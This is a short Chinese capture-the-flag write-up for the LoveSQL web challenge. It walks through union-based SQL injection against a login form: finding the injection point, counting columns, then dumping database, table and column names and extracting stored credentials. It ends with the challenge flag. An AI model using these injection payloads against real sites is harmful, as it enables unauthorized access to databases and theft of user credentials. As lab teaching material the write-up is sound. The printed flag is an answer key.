web20([极客大挑战 2019]LoveSQL):

1.对用户名和密码输入1 查看回显(提示错误密码)--->将用户名修改为1'(报错,找到注入点)

2.对用户名依次输入

1' order by 4#
1' order by 1#
1' order by 3#

测试出有3列

测试回显位:

1' union select 1,2,3#

联合查询:
爆库名:geek

1' union select 1,database(),3#

爆表名:geekuser和l0ve1ysq1

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

爆列名:两张表的3个列名都是:id,username,password

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='geekuser'#
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#

爆flag:

1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1#

FLAG:flag{4d07dd44-e99d-4512-9b7e-f6702d1e9aa5}